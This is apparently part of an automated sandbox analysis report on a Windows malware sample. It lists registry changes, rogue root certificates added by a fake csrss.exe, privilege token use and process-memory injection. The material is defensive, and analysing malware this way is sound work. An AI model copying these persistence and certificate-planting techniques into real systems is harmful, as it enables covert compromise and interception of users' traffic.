Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e71718400000000020000000000106600000001000020000000917ec9c3c9bacad502bb682259c49b17a7ad61f669fbd98e245d351f627d320e000000000e8000000002000020000000940c372636112fd0204613537486a90bb114fd6ff5d26c0f6f5734e343bf9466200000004aacc15594d1434d2dc067f460043ff70f9627e0f534e262508c2c4000f740c2400000006986088479b33ad481312f0760cc1e2306af86b0b00945eb6e35f873fd0d5dde721984a2e34368a83766220827785843f82f3c22b3f8f0ed6e5ce03a1b99c929 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4271BB11-779B-11EE-B466-42BF89FD39DA} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 706e3d40a80bda01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FB7B.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
